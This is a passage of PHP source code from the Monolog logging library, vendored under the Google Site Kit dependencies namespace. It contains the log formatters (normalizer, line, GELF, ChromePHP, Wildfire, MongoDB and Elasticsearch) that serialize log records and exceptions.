: string { switch ($this->batchMode) { case static::BATCH_MODE_NEWLINES: return $this->formatBatchNewlines($records); case static::BATCH_MODE_JSON: default: return $this->formatBatchJson($records); } } /** * @return self */ public function includeStacktraces(bool $include = \true) : self { $this->includeStacktraces = $include; return $this; } /** * Return a JSON-encoded array of records. * * @phpstan-param Record[] $records */ protected function formatBatchJson(array $records) : string { return $this->toJson($this->normalize($records), \true); } /** * Use new lines to separate records instead of a * JSON-encoded array. * * @phpstan-param Record[] $records */ protected function formatBatchNewlines(array $records) : string { $instance = $this; $oldNewline = $this->appendNewline; $this->appendNewline = \false; \array_walk($records, function (&$value, $key) use($instance) { $value = $instance->format($value); }); $this->appendNewline = $oldNewline; return \implode("\n", $records); } /** * Normalizes given $data. * * @param mixed $data * * @return mixed */ protected function normalize($data, int $depth = 0) { if ($depth > $this->maxNormalizeDepth) { return 'Over ' . $this->maxNormalizeDepth . ' levels deep, aborting normalization'; } if (\is_array($data)) { $normalized = []; $count = 1; foreach ($data as $key => $value) { if ($count++ > $this->maxNormalizeItemCount) { $normalized['...'] = 'Over ' . $this->maxNormalizeItemCount . ' items (' . \count($data) . ' total), aborting normalization'; break; } $normalized[$key] = $this->normalize($value, $depth + 1); } return $normalized; } if (\is_object($data)) { if ($data instanceof \DateTimeInterface) { return $this->formatDate($data); } if ($data instanceof \Throwable) { return $this->normalizeException($data, $depth); } // if the object has specific json serializability we want to make sure we skip the __toString treatment below if ($data instanceof \JsonSerializable) { return $data; } if (\get_class($data) === '__PHP_Incomplete_Class') { return new \ArrayObject($data); } if (\method_exists($data, '__toString')) { return $data->__toString(); } return $data; } if (\is_resource($data)) { return parent::normalize($data); } return $data; } /** * Normalizes given exception with or without its own stack trace based on * `includeStacktraces` property. * * {@inheritDoc} */ protected function normalizeException(\Throwable $e, int $depth = 0) : array { $data = parent::normalizeException($e, $depth); if (!$this->includeStacktraces) { unset($data['trace']); } return $data; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Google\Site_Kit_Dependencies\Monolog\DateTimeImmutable; use Google\Site_Kit_Dependencies\Monolog\Utils; use Throwable; /** * Normalizes incoming records to remove objects/resources so it's easier to dump to various targets * * @author Jordi Boggiano <j.boggiano@seld.be> */ class NormalizerFormatter implements \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { public const SIMPLE_DATE = "Y-m-d\\TH:i:sP"; /** @var string */ protected $dateFormat; /** @var int */ protected $maxNormalizeDepth = 9; /** @var int */ protected $maxNormalizeItemCount = 1000; /** @var int */ private $jsonEncodeOptions = \Google\Site_Kit_Dependencies\Monolog\Utils::DEFAULT_JSON_FLAGS; /** * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format */ public function __construct(?string $dateFormat = null) { $this->dateFormat = null === $dateFormat ? static::SIMPLE_DATE : $dateFormat; if (!\function_exists('json_encode')) { throw new \RuntimeException('PHP\'s json extension is required to use Monolog\'s NormalizerFormatter'); } } /** * {@inheritDoc} * * @param mixed[] $record */ public function format(array $record) { return $this->normalize($record); } /** * {@inheritDoc} */ public function formatBatch(array $records) { foreach ($records as $key => $record) { $records[$key] = $this->format($record); } return $records; } public function getDateFormat() : string { return $this->dateFormat; } public function setDateFormat(string $dateFormat) : self { $this->dateFormat = $dateFormat; return $this; } /** * The maximum number of normalization levels to go through */ public function getMaxNormalizeDepth() : int { return $this->maxNormalizeDepth; } public function setMaxNormalizeDepth(int $maxNormalizeDepth) : self { $this->maxNormalizeDepth = $maxNormalizeDepth; return $this; } /** * The maximum number of items to normalize per level */ public function getMaxNormalizeItemCount() : int { return $this->maxNormalizeItemCount; } public function setMaxNormalizeItemCount(int $maxNormalizeItemCount) : self { $this->maxNormalizeItemCount = $maxNormalizeItemCount; return $this; } /** * Enables `json_encode` pretty print. */ public function setJsonPrettyPrint(bool $enable) : self { if ($enable) { $this->jsonEncodeOptions |= \JSON_PRETTY_PRINT; } else { $this->jsonEncodeOptions &= ~\JSON_PRETTY_PRINT; } return $this; } /** * @param mixed $data * @return null|scalar|array<array|scalar|null> */ protected function normalize($data, int $depth = 0) { if ($depth > $this->maxNormalizeDepth) { return 'Over ' . $this->maxNormalizeDepth . ' levels deep, aborting normalization'; } if (null === $data || \is_scalar($data)) { if (\is_float($data)) { if (\is_infinite($data)) { return ($data > 0 ? '' : '-') . 'INF'; } if (\is_nan($data)) { return 'NaN'; } } return $data; } if (\is_array($data)) { $normalized = []; $count = 1; foreach ($data as $key => $value) { if ($count++ > $this->maxNormalizeItemCount) { $normalized['...'] = 'Over ' . $this->maxNormalizeItemCount . ' items (' . \count($data) . ' total), aborting normalization'; break; } $normalized[$key] = $this->normalize($value, $depth + 1); } return $normalized; } if ($data instanceof \DateTimeInterface) { return $this->formatDate($data); } if (\is_object($data)) { if ($data instanceof \Throwable) { return $this->normalizeException($data, $depth); } if ($data instanceof \JsonSerializable) { /** @var null|scalar|array<array|scalar|null> $value */ $value = $data->jsonSerialize(); } elseif (\get_class($data) === '__PHP_Incomplete_Class') { $accessor = new \ArrayObject($data); $value = (string) $accessor['__PHP_Incomplete_Class_Name']; } elseif (\method_exists($data, '__toString')) { /** @var string $value */ $value = $data->__toString(); } else { // the rest is normalized by json encoding and decoding it /** @var null|scalar|array<array|scalar|null> $value */ $value = \json_decode($this->toJson($data, \true), \true); } return [\Google\Site_Kit_Dependencies\Monolog\Utils::getClass($data) => $value]; } if (\is_resource($data)) { return \sprintf('[resource(%s)]', \get_resource_type($data)); } return '[unknown(' . \gettype($data) . ')]'; } /** * @return mixed[] */ protected function normalizeException(\Throwable $e, int $depth = 0) { if ($depth > $this->maxNormalizeDepth) { return ['Over ' . $this->maxNormalizeDepth . ' levels deep, aborting normalization']; } if ($e instanceof \JsonSerializable) { return (array) $e->jsonSerialize(); } $data = ['class' => \Google\Site_Kit_Dependencies\Monolog\Utils::getClass($e), 'message' => $e->getMessage(), 'code' => (int) $e->getCode(), 'file' => $e->getFile() . ':' . $e->getLine()]; if ($e instanceof \SoapFault) { if (isset($e->faultcode)) { $data['faultcode'] = $e->faultcode; } if (isset($e->faultactor)) { $data['faultactor'] = $e->faultactor; } if (isset($e->detail)) { if (\is_string($e->detail)) { $data['detail'] = $e->detail; } elseif (\is_object($e->detail) || \is_array($e->detail)) { $data['detail'] = $this->toJson($e->detail, \true); } } } $trace = $e->getTrace(); foreach ($trace as $frame) { if (isset($frame['file'])) { $data['trace'][] = $frame['file'] . ':' . $frame['line']; } } if ($previous = $e->getPrevious()) { $data['previous'] = $this->normalizeException($previous, $depth + 1); } return $data; } /** * Return the JSON representation of a value * * @param mixed $data * @throws \RuntimeException if encoding fails and errors are not ignored * @return string if encoding fails and ignoreErrors is true 'null' is returned */ protected function toJson($data, bool $ignoreErrors = \false) : string { return \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($data, $this->jsonEncodeOptions, $ignoreErrors); } /** * @return string */ protected function formatDate(\DateTimeInterface $date) { // in case the date format isn't custom then we defer to the custom DateTimeImmutable // formatting logic, which will pick the right format based on whether useMicroseconds is on if ($this->dateFormat === self::SIMPLE_DATE && $date instanceof \Google\Site_Kit_Dependencies\Monolog\DateTimeImmutable) { return (string) $date; } return $date->format($this->dateFormat); } public function addJsonEncodeOption(int $option) : self { $this->jsonEncodeOptions |= $option; return $this; } public function removeJsonEncodeOption(int $option) : self { $this->jsonEncodeOptions &= ~$option; return $this; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Gelf\Message; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Serializes a log message to GELF * @see http://docs.graylog.org/en/latest/pages/gelf.html * * @author Matt Lehner <mlehner@gmail.com> * * @phpstan-import-type Level from \Monolog\Logger */ class GelfMessageFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { protected const DEFAULT_MAX_LENGTH = 32766; /** * @var string the name of the system for the Gelf log message */ protected $systemName; /** * @var string a prefix for 'extra' fields from the Monolog record (optional) */ protected $extraPrefix; /** * @var string a prefix for 'context' fields from the Monolog record (optional) */ protected $contextPrefix; /** * @var int max length per field */ protected $maxLength; /** * @var int */ private $gelfVersion = 2; /** * Translates Monolog log levels to Graylog2 log priorities. * * @var array<int, int> * * @phpstan-var array<Level, int> */ private $logLevels = [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => 7, \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => 6, \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => 5, \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => 4, \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => 3, \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => 2, \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => 1, \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => 0]; public function __construct(?string $systemName = null, ?string $extraPrefix = null, string $contextPrefix = 'ctxt_', ?int $maxLength = null) { if (!\class_exists(\Google\Site_Kit_Dependencies\Gelf\Message::class)) { throw new \RuntimeException('Composer package graylog2/gelf-php is required to use Monolog\'s GelfMessageFormatter'); } parent::__construct('U.u'); $this->systemName = \is_null($systemName) || $systemName === '' ? (string) \gethostname() : $systemName; $this->extraPrefix = \is_null($extraPrefix) ? '' : $extraPrefix; $this->contextPrefix = $contextPrefix; $this->maxLength = \is_null($maxLength) ? self::DEFAULT_MAX_LENGTH : $maxLength; if (\method_exists(\Google\Site_Kit_Dependencies\Gelf\Message::class, 'setFacility')) { $this->gelfVersion = 1; } } /** * {@inheritDoc} */ public function format(array $record) : \Google\Site_Kit_Dependencies\Gelf\Message { $context = $extra = []; if (isset($record['context'])) { /** @var mixed[] $context */ $context = parent::normalize($record['context']); } if (isset($record['extra'])) { /** @var mixed[] $extra */ $extra = parent::normalize($record['extra']); } if (!isset($record['datetime'], $record['message'], $record['level'])) { throw new \InvalidArgumentException('The record should at least contain datetime, message and level keys, ' . \var_export($record, \true) . ' given'); } $message = new \Google\Site_Kit_Dependencies\Gelf\Message(); $message->setTimestamp($record['datetime'])->setShortMessage((string) $record['message'])->setHost($this->systemName)->setLevel($this->logLevels[$record['level']]); // message length + system name length + 200 for padding / metadata $len = 200 + \strlen((string) $record['message']) + \strlen($this->systemName); if ($len > $this->maxLength) { $message->setShortMessage(\Google\Site_Kit_Dependencies\Monolog\Utils::substr($record['message'], 0, $this->maxLength)); } if ($this->gelfVersion === 1) { if (isset($record['channel'])) { $message->setFacility($record['channel']); } if (isset($extra['line'])) { $message->setLine($extra['line']); unset($extra['line']); } if (isset($extra['file'])) { $message->setFile($extra['file']); unset($extra['file']); } } else { $message->setAdditional('facility', $record['channel']); } foreach ($extra as $key => $val) { $val = \is_scalar($val) || null === $val ? $val : $this->toJson($val); $len = \strlen($this->extraPrefix . $key . $val); if ($len > $this->maxLength) { $message->setAdditional($this->extraPrefix . $key, \Google\Site_Kit_Dependencies\Monolog\Utils::substr((string) $val, 0, $this->maxLength)); continue; } $message->setAdditional($this->extraPrefix . $key, $val); } foreach ($context as $key => $val) { $val = \is_scalar($val) || null === $val ? $val : $this->toJson($val); $len = \strlen($this->contextPrefix . $key . $val); if ($len > $this->maxLength) { $message->setAdditional($this->contextPrefix . $key, \Google\Site_Kit_Dependencies\Monolog\Utils::substr((string) $val, 0, $this->maxLength)); continue; } $message->setAdditional($this->contextPrefix . $key, $val); } if ($this->gelfVersion === 1) { /** @phpstan-ignore-next-line */ if (null === $message->getFile() && isset($context['exception']['file'])) { if (\preg_match("/^(.+):([0-9]+)\$/", $context['exception']['file'], $matches)) { $message->setFile($matches[1]); $message->setLine($matches[2]); } } } return $message; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Formats a log message according to the ChromePHP array format * * @author Christophe Coevoet <stof@notk.org> */ class ChromePHPFormatter implements \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { /** * Translates Monolog log levels to Wildfire levels. * * @var array<int, 'log'|'info'|'warn'|'error'> */ private $logLevels = [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => 'log', \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => 'info', \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => 'info', \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => 'warn', \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => 'error', \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => 'error', \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => 'error', \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => 'error']; /** * {@inheritDoc} */ public function format(array $record) { // Retrieve the line and file if set and remove them from the formatted extra $backtrace = 'unknown'; if (isset($record['extra']['file'], $record['extra']['line'])) { $backtrace = $record['extra']['file'] . ' : ' . $record['extra']['line']; unset($record['extra']['file'], $record['extra']['line']); } $message = ['message' => $record['message']]; if ($record['context']) { $message['context'] = $record['context']; } if ($record['extra']) { $message['extra'] = $record['extra']; } if (\count($message) === 1) { $message = \reset($message); } return [$record['channel'], $message, $backtrace, $this->logLevels[$record['level']]]; } /** * {@inheritDoc} */ public function formatBatch(array $records) { $formatted = []; foreach ($records as $record) { $formatted[] = $this->format($record); } return $formatted; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use MongoDB\BSON\Type; use MongoDB\BSON\UTCDateTime; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Formats a record for use with the MongoDBHandler. * * @author Florian Plattner <me@florianplattner.de> */ class MongoDBFormatter implements \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { /** @var bool */ private $exceptionTraceAsString; /** @var int */ private $maxNestingLevel; /** @var bool */ private $isLegacyMongoExt; /** * @param int $maxNestingLevel 0 means infinite nesting, the $record itself is level 1, $record['context'] is 2 * @param bool $exceptionTraceAsString set to false to log exception traces as a sub documents instead of strings */ public function __construct(int $maxNestingLevel = 3, bool $exceptionTraceAsString = \true) { $this->maxNestingLevel = \max($maxNestingLevel, 0); $this->exceptionTraceAsString = $exceptionTraceAsString; $this->isLegacyMongoExt = \extension_loaded('mongodb') && \version_compare((string) \phpversion('mongodb'), '1.1.9', '<='); } /** * {@inheritDoc} * * @return mixed[] */ public function format(array $record) : array { /** @var mixed[] $res */ $res = $this->formatArray($record); return $res; } /** * {@inheritDoc} * * @return array<mixed[]> */ public function formatBatch(array $records) : array { $formatted = []; foreach ($records as $key => $record) { $formatted[$key] = $this->format($record); } return $formatted; } /** * @param mixed[] $array * @return mixed[]|string Array except when max nesting level is reached then a string "[...]" */ protected function formatArray(array $array, int $nestingLevel = 0) { if ($this->maxNestingLevel > 0 && $nestingLevel > $this->maxNestingLevel) { return '[...]'; } foreach ($array as $name => $value) { if ($value instanceof \DateTimeInterface) { $array[$name] = $this->formatDate($value, $nestingLevel + 1); } elseif ($value instanceof \Throwable) { $array[$name] = $this->formatException($value, $nestingLevel + 1); } elseif (\is_array($value)) { $array[$name] = $this->formatArray($value, $nestingLevel + 1); } elseif (\is_object($value) && !$value instanceof \MongoDB\BSON\Type) { $array[$name] = $this->formatObject($value, $nestingLevel + 1); } } return $array; } /** * @param mixed $value * @return mixed[]|string */ protected function formatObject($value, int $nestingLevel) { $objectVars = \get_object_vars($value); $objectVars['class'] = \Google\Site_Kit_Dependencies\Monolog\Utils::getClass($value); return $this->formatArray($objectVars, $nestingLevel); } /** * @return mixed[]|string */ protected function formatException(\Throwable $exception, int $nestingLevel) { $formattedException = ['class' => \Google\Site_Kit_Dependencies\Monolog\Utils::getClass($exception), 'message' => $exception->getMessage(), 'code' => (int) $exception->getCode(), 'file' => $exception->getFile() . ':' . $exception->getLine()]; if ($this->exceptionTraceAsString === \true) { $formattedException['trace'] = $exception->getTraceAsString(); } else { $formattedException['trace'] = $exception->getTrace(); } return $this->formatArray($formattedException, $nestingLevel); } protected function formatDate(\DateTimeInterface $value, int $nestingLevel) : \MongoDB\BSON\UTCDateTime { if ($this->isLegacyMongoExt) { return $this->legacyGetMongoDbDateTime($value); } return $this->getMongoDbDateTime($value); } private function getMongoDbDateTime(\DateTimeInterface $value) : \MongoDB\BSON\UTCDateTime { return new \MongoDB\BSON\UTCDateTime((int) \floor((float) $value->format('U.u') * 1000)); } /** * This is needed to support MongoDB Driver v1.19 and below * * See https://github.com/mongodb/mongo-php-driver/issues/426 * * It can probably be removed in 2.1 or later once MongoDB's 1.2 is released and widely adopted */ private function legacyGetMongoDbDateTime(\DateTimeInterface $value) : \MongoDB\BSON\UTCDateTime { $milliseconds = \floor((float) $value->format('U.u') * 1000); $milliseconds = \PHP_INT_SIZE == 8 ? (int) $milliseconds : (string) $milliseconds; // @phpstan-ignore-next-line return new \MongoDB\BSON\UTCDateTime($milliseconds); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; /** * Formats data into an associative array of scalar values. * Objects and arrays will be JSON encoded. * * @author Andrew Lawson <adlawson@gmail.com> */ class ScalarFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { /** * {@inheritDoc} * * @phpstan-return array<string, scalar|null> $record */ public function format(array $record) : array { $result = []; foreach ($record as $key => $value) { $result[$key] = $this->normalizeValue($value); } return $result; } /** * @param mixed $value * @return scalar|null */ protected function normalizeValue($value) { $normalized = $this->normalize($value); if (\is_array($normalized)) { return $this->toJson($normalized, \true); } return $normalized; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Formats incoming records into a one-line string * * This is especially useful for logging to files * * @author Jordi Boggiano <j.boggiano@seld.be> * @author Christophe Coevoet <stof@notk.org> */ class LineFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { public const SIMPLE_FORMAT = "[%datetime%] %channel%.%level_name%: %message% %context% %extra%\n"; /** @var string */ protected $format; /** @var bool */ protected $allowInlineLineBreaks; /** @var bool */ protected $ignoreEmptyContextAndExtra; /** @var bool */ protected $includeStacktraces; /** @var ?callable */ protected $stacktracesParser; /** * @param string|null $format The format of the message * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format * @param bool $allowInlineLineBreaks Whether to allow inline line breaks in log entries * @param bool $ignoreEmptyContextAndExtra */ public function __construct(?string $format = null, ?string $dateFormat = null, bool $allowInlineLineBreaks = \false, bool $ignoreEmptyContextAndExtra = \false, bool $includeStacktraces = \false) { $this->format = $format === null ? static::SIMPLE_FORMAT : $format; $this->allowInlineLineBreaks = $allowInlineLineBreaks; $this->ignoreEmptyContextAndExtra = $ignoreEmptyContextAndExtra; $this->includeStacktraces($includeStacktraces); parent::__construct($dateFormat); } public function includeStacktraces(bool $include = \true, ?callable $parser = null) : self { $this->includeStacktraces = $include; if ($this->includeStacktraces) { $this->allowInlineLineBreaks = \true; $this->stacktracesParser = $parser; } return $this; } public function allowInlineLineBreaks(bool $allow = \true) : self { $this->allowInlineLineBreaks = $allow; return $this; } public function ignoreEmptyContextAndExtra(bool $ignore = \true) : self { $this->ignoreEmptyContextAndExtra = $ignore; return $this; } /** * {@inheritDoc} */ public function format(array $record) : string { $vars = parent::format($record); $output = $this->format; foreach ($vars['extra'] as $var => $val) { if (\false !== \strpos($output, '%extra.' . $var . '%')) { $output = \str_replace('%extra.' . $var . '%', $this->stringify($val), $output); unset($vars['extra'][$var]); } } foreach ($vars['context'] as $var => $val) { if (\false !== \strpos($output, '%context.' . $var . '%')) { $output = \str_replace('%context.' . $var . '%', $this->stringify($val), $output); unset($vars['context'][$var]); } } if ($this->ignoreEmptyContextAndExtra) { if (empty($vars['context'])) { unset($vars['context']); $output = \str_replace('%context%', '', $output); } if (empty($vars['extra'])) { unset($vars['extra']); $output = \str_replace('%extra%', '', $output); } } foreach ($vars as $var => $val) { if (\false !== \strpos($output, '%' . $var . '%')) { $output = \str_replace('%' . $var . '%', $this->stringify($val), $output); } } // remove leftover %extra.xxx% and %context.xxx% if any if (\false !== \strpos($output, '%')) { $output = \preg_replace('/%(?:extra|context)\\..+?%/', '', $output); if (null === $output) { $pcreErrorCode = \preg_last_error(); throw new \RuntimeException('Failed to run preg_replace: ' . $pcreErrorCode . ' / ' . \Google\Site_Kit_Dependencies\Monolog\Utils::pcreLastErrorMessage($pcreErrorCode)); } } return $output; } public function formatBatch(array $records) : string { $message = ''; foreach ($records as $record) { $message .= $this->format($record); } return $message; } /** * @param mixed $value */ public function stringify($value) : string { return $this->replaceNewlines($this->convertToString($value)); } protected function normalizeException(\Throwable $e, int $depth = 0) : string { $str = $this->formatException($e); if ($previous = $e->getPrevious()) { do { $depth++; if ($depth > $this->maxNormalizeDepth) { $str .= "\n[previous exception] Over " . $this->maxNormalizeDepth . ' levels deep, aborting normalization'; break; } $str .= "\n[previous exception] " . $this->formatException($previous); } while ($previous = $previous->getPrevious()); } return $str; } /** * @param mixed $data */ protected function convertToString($data) : string { if (null === $data || \is_bool($data)) { return \var_export($data, \true); } if (\is_scalar($data)) { return (string) $data; } return $this->toJson($data, \true); } protected function replaceNewlines(string $str) : string { if ($this->allowInlineLineBreaks) { if (0 === \strpos($str, '{')) { $str = \preg_replace('/(?<!\\\\)\\\\[rn]/', "\n", $str); if (null === $str) { $pcreErrorCode = \preg_last_error(); throw new \RuntimeException('Failed to run preg_replace: ' . $pcreErrorCode . ' / ' . \Google\Site_Kit_Dependencies\Monolog\Utils::pcreLastErrorMessage($pcreErrorCode)); } } return $str; } return \str_replace(["\r\n", "\r", "\n"], ' ', $str); } private function formatException(\Throwable $e) : string { $str = '[object] (' . \Google\Site_Kit_Dependencies\Monolog\Utils::getClass($e) . '(code: ' . $e->getCode(); if ($e instanceof \SoapFault) { if (isset($e->faultcode)) { $str .= ' faultcode: ' . $e->faultcode; } if (isset($e->faultactor)) { $str .= ' faultactor: ' . $e->faultactor; } if (isset($e->detail)) { if (\is_string($e->detail)) { $str .= ' detail: ' . $e->detail; } elseif (\is_object($e->detail) || \is_array($e->detail)) { $str .= ' detail: ' . $this->toJson($e->detail, \true); } } } $str .= '): ' . $e->getMessage() . ' at ' . $e->getFile() . ':' . $e->getLine() . ')'; if ($this->includeStacktraces) { $str .= $this->stacktracesParser($e); } return $str; } private function stacktracesParser(\Throwable $e) : string { $trace = $e->getTraceAsString(); if ($this->stacktracesParser) { $trace = $this->stacktracesParserCustom($trace); } return "\n[stacktrace]\n" . $trace . "\n"; } private function stacktracesParserCustom(string $trace) : string { return \implode("\n", \array_filter(\array_map($this->stacktracesParser, \explode("\n", $trace)))); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; /** * Interface for formatters * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger */ interface FormatterInterface { /** * Formats a log record. * * @param array $record A record to format * @return mixed The formatted record * * @phpstan-param Record $record */ public function format(array $record); /** * Formats a set of log records. * * @param array $records A set of records to format * @return mixed The formatted set of records * * @phpstan-param Record[] $records */ public function formatBatch(array $records); } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Serializes a log message according to Wildfire's header requirements * * @author Eric Clemmons (@ericclemmons) <eric@uxdriven.com> * @author Christophe Coevoet <stof@notk.org> * @author Kirill chEbba Chebunin <iam@chebba.org> * * @phpstan-import-type Level from \Monolog\Logger */ class WildfireFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { /** * Translates Monolog log levels to Wildfire levels. * * @var array<Level, string> */ private $logLevels = [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => 'LOG', \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => 'INFO', \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => 'INFO', \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => 'WARN', \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => 'ERROR', \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => 'ERROR', \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => 'ERROR', \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => 'ERROR']; /** * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format */ public function __construct(?string $dateFormat = null) { parent::__construct($dateFormat); // http headers do not like non-ISO-8559-1 characters $this->removeJsonEncodeOption(\JSON_UNESCAPED_UNICODE); } /** * {@inheritDoc} * * @return string */ public function format(array $record) : string { // Retrieve the line and file if set and remove them from the formatted extra $file = $line = ''; if (isset($record['extra']['file'])) { $file = $record['extra']['file']; unset($record['extra']['file']); } if (isset($record['extra']['line'])) { $line = $record['extra']['line']; unset($record['extra']['line']); } /** @var mixed[] $record */ $record = $this->normalize($record); $message = ['message' => $record['message']]; $handleError = \false; if ($record['context']) { $message['context'] = $record['context']; $handleError = \true; } if ($record['extra']) { $message['extra'] = $record['extra']; $handleError = \true; } if (\count($message) === 1) { $message = \reset($message); } if (isset($record['context']['table'])) { $type = 'TABLE'; $label = $record['channel'] . ': ' . $record['message']; $message = $record['context']['table']; } else { $type = $this->logLevels[$record['level']]; $label = $record['channel']; } // Create JSON object describing the appearance of the message in the console $json = $this->toJson([['Type' => $type, 'File' => $file, 'Line' => $line, 'Label' => $label], $message], $handleError); // The message itself is a serialization of the above JSON object + it's length return \sprintf('%d|%s|', \strlen($json), $json); } /** * {@inheritDoc} * * @phpstan-return never */ public function formatBatch(array $records) { throw new \BadMethodCallException('Batch formatting does not make sense for the WildfireFormatter'); } /** * {@inheritDoc} * * @return null|scalar|array<array|scalar|null>|object */ protected function normalize($data, int $depth = 0) { if (\is_object($data) && !$data instanceof \DateTimeInterface) { return $data; } return parent::normalize($data, $depth); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Google\Site_Kit_Dependencies\Elastica\Document; /** * Format a log message into an Elastica Document * * @author Jelle Vink <jelle.vink@gmail.com> * * @phpstan-import-type Record from \Monolog\Logger */ class ElasticaFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { /** * @var string Elastic search index name */ protected $index; /** * @var ?string Elastic search document type */ protected $type; /** * @param string $index Elastic Search index name * @param ?string $type Elastic Search document type, deprecated as of Elastica 7 */ public function __construct(string $index, ?string $type) { // elasticsearch requires a ISO 8601 format date with optional millisecond precision. parent::__construct('Y-m-d\\TH:i:s.uP'); $this->index = $index; $this->type = $type; } /** * {@inheritDoc} */ public function format(array $record) { $record = parent::format($record); return $this->getDocument($record); } public function getIndex() : string { return $this->index; } /** * @deprecated since Elastica 7 type has no effect */ public function getType() : string { /** @phpstan-ignore-next-line */ return $this->type; } /** * Convert a log message into an Elastica Document * * @phpstan-param Record $record */ protected function getDocument(array $record) : \Google\Site_Kit_Dependencies\Elastica\Document { $document = new \Google\Site_Kit_Dependencies\Elastica\Document(); $document->setData($record); if (\method_exists($document, 'setType')) { /** @phpstan-ignore-next-line */ $document->setType($this->type); } $document->setIndex($this->index); return $document; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use DateTimeInterface; /** * Format a log message into an Elasticsearch record * * @author Avtandil Kikabidze <akalongman@gmail.com> */ class ElasticsearchFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { /** * @var string Elasticsearch index name */ protected $index; /** * @var string Elasticsearch record type */ protected $type; /** * @param string $index Elasticsearch index name * @param string $type Elasticsearch record type */ public function __construct(string $index, string $type) { // Elasticsearch requires an ISO 8601 format date with optional millisecond precision. parent::__construct(\DateTimeInterface::ISO8601); $this->index = $index; $this->type = $type; } /** * {@inheritDoc} */ public function format(array $record) { $record = parent::format($record); return $this->getDocument($record); } /** * Getter index * * @return string */ public function getIndex() : string { return $this->index; } /** * Getter type * * @return string */ public function getType() : string { return $this->type; } /** * Convert a log message into an Elasticsearch record * * @param mixed[] $record Log message * @return mixed[] */ protected function getDocument(array $record) : array { $record['_index'] = $this->index; $record['_type'] = 